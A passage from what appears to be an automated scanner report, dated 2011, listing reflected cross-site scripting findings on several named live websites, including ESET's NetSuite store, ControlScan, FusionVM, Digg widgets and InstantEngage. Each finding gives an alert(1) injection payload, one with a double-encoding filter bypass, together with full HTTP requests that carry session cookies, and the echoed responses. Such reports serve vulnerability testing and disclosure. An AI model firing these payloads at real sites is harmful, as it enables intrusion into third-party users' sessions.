Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:20:44 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1564875036:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54762

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/s.nl?c=438708&sc=3&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1&whence=&6483e'style='x:expression(alert(1))'be136aaa48c=1&6483e%27style%3d%27x%3aexpression%28alert%281%29%29%27be136aaa48c=1&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8'>
...[SNIP]...

6.44. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.3/.f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c1c0'style%3d'x%3aexpression(alert(1))'009af4d5fc7 was submitted in the REST URL parameter 2. This input was echoed as 7c1c0'style='x:expression(alert(1))'009af4d5fc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.4387087c1c0'style%3d'x%3aexpression(alert(1))'009af4d5fc7/n.1/sc.3/.f?ck=rcHW8415AciYvvMS&vid=rcHW8415AZeYvnmq&cktime=96655&cart=3606740&promocode=&dontcookiepromocode=T&chrole=17&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.1.10.1303741547; __utmc=1; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:52:11 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1139567357:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54807

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/s.nl?c=4387087c1c0'style='x:expression(alert(1))'009af4d5fc7&sc=3&n=1&ext=T'>
...[SNIP]...

6.45. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.3/.f

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bff16%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272d37b9cdc0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bff16'style='x:expression(alert(1))'2d37b9cdc0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.438708/n.1/sc.3/.f?ck=rcHW8415AciYvvMS&vid=rcHW8415AZeYvnmq&cktime=96655&cart=3606740&promocode=&dontcookiepromocode=T&chrole=17&ext=T&bff16%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272d37b9cdc0d=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.1.10.1303741547; __utmc=1; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121575945:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49710

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
rt%25281%2529%2529%25272d37b9cdc0d=1&bff16%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272d37b9cdc0d=1&bff16%27style%3d%27x%3aexpression%28alert%281%29%29%272d37b9cdc0d=1&n=1&ext=T&bff16'style='x:expression(alert(1))'2d37b9cdc0d=1'>
...[SNIP]...

6.46. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/security-manager/forum.php

Issue detail

The value of the char request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 78007%3balert(1)//2b991119c48 was submitted in the char parameter. This input was echoed as 78007;alert(1)//2b991119c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/security-manager/forum.php?limit=5&char=2578007%3balert(1)//2b991119c48 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64452

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a class=\"forumTitle\" target=\"_blank\" href='http://forums.manageengine.com/#Topic/"+rem[i].tpid+"'>"+forumtitle.substring(0,2578007;alert(1)//2b991119c48)+"...</a>
...[SNIP]...

6.47. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload b0826<script>alert(1)</script>044029140f9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:10:55 GMT
Via: NS-CACHE: 100
Etag: "3112ca90777458234aafe3bc78669cb02bb4b372"
Content-Length: 191
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 25 Apr 2011 12:20:54 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9", "diggs": 0});

6.48. https://www.controlscan.com/save_order.php [company parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/save_order.php

Issue detail

The value of the company request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c8d1'%3balert(1)//ee74115e8d1 was submitted in the company parameter. This input was echoed as 3c8d1';alert(1)//ee74115e8d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /save_order.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
Origin: https://www.controlscan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac
Content-Length: 348

total=747.00&firstname=%27&lastname=%27&company=%27%273c8d1'%3balert(1)//ee74115e8d1&email=%27%40%3B.net&phone=111-222-3334&merchantID=&ipscan=10.0.1.1&cardfname=1&cardlname=1&address1=1&address2=1&city=dg&country=us&province=&state=AL&zipcode=09876&cardtype=MC&cardnumber=54636345635
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:57:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
/*globals YWA*/
var YWATracker = YWA.getTracker("1000725800122");
YWATracker.setMemberId('''3c8d1';alert(1)//ee74115e8d1_');/*
YWATracker.setDocumentName("");
YWATracker.setDocumentGroup("");
*/
YWATracker.submit();
</script>
...[SNIP]...

6.49. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 5a188<script>alert(1)</script>e5eb79051f was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
0alhcvIV7k7bu3g37AjmVa5J8yQOnBJBS8b%2Btlnypc31JyCiXOrCIh%2Fwf2BKBjw%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.084691817406564955a188<script>alert(1)</script>e5eb79051f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:57:37 GMT
Content-Length: 5375

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.084691817406564955a188<script>alert(1)</script>e5eb79051f<&>
...[SNIP]...

6.50. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload 2417a<script>alert(1)</script>718a25325a7 was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY%2Fy9C8ZIzR2417a<script>alert(1)</script>718a25325a7&__VIEWSTATE=1eNrdW81vG8cVFylRlkLHdGObTeOAmihObMX82CW5%2FFCsJJRkR4otRxUpOUgguMOdITnWcpfdnRXFHoqeeuyhKFK0hxZJPw5F0X%2BhQK9tcuihQE9tXfTj1KbfBXpI3%2BwuRVKSLVOioTAUwFnOvjf73vv95s3X6mNfKBQIxmRFTqdz8JcMhf2R
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:31 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
ViewState: /wEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY/y9C8ZIzR2417a<script>alert(1)</script>718a25325a7 --->
...[SNIP]...

6.51. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15c"-alert(1)-"7bb0c543e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:56:49 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:48 GMT
Content-Length: 33904

<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?ad15c%22-alert(1)-%227bb0c543e64=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?ad15c"-alert(1)-"7bb0c543e64=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...

6.52. http://www.google.com/search [tch parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbae5(a)c4e69dbcb8a was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search?sclient=psy&hl=en&source=hp&q=learn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D1112%26pg%3D697&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=76258fd74ceb8990&tch=1dbae5(a)c4e69dbcb8a&ech=1&psi=QW21TdK5G9PngQf2xuWSBA13037356298833 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:47:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 25014

f94-wCe9....S....o....Q...v....l.K<!doctype html><title>learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697. F..\(function(){var jesr_base_page_version=8;var jesr_user_state='c9c918f0';var jesr_sign
...[SNIP]...
index.cfm%3Fm%3D1112%26pg%3D697\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3d76258fd74ceb8990\\x26amp;tch\\x3d1dbae5(a)c4e69dbcb8a\\x26amp;ech\\x3d1\\x26amp;psi\\x3dQW21TdK5G9PngQf2xuWSBA13037356298833\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26google
...[SNIP]...

6.53. http://www.instantengage.com/open_chat.php [Email_To parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.instantengage.com
Path:	/open_chat.php

Issue detail

The value of the Email_To request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5f03"%3balert(1)//2d082375fa0 was submitted in the Email_To parameter. This input was echoed as b5f03";alert(1)//2d082375fa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /open_chat.php?Account_ID=1756&Page_ID=2293&Email_To=alan%40integritydefender.comb5f03"%3balert(1)//2d082375fa0&Email_Subject=Enquires%20for%20Integrity%20Defenders HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:14 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 5284
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>

<script language="javascript">
<!--
//InstantEngage Script Template//

//Page Variables - System Generated
var gURL_Server = "www.instantengage.com";
var gSSL_Port = 443;
va
...[SNIP]...
ww.instantengage.com/images/but_smassist.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images/but_smno_operator.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.comb5f03";alert(1)//2d082375fa0";var OperatorOfflineEmailSubject = "Enquiries for InstantEngage";
var VisitorDefaultName = ""; // The server can actually place the actual Name here
var VisitorDefaultEmail = ""; // The server can a
...[SNIP]...

6.54. http://www.instantengage.com/open_chat.php [Page_ID parameter] previous next

Summary

Severity:	High
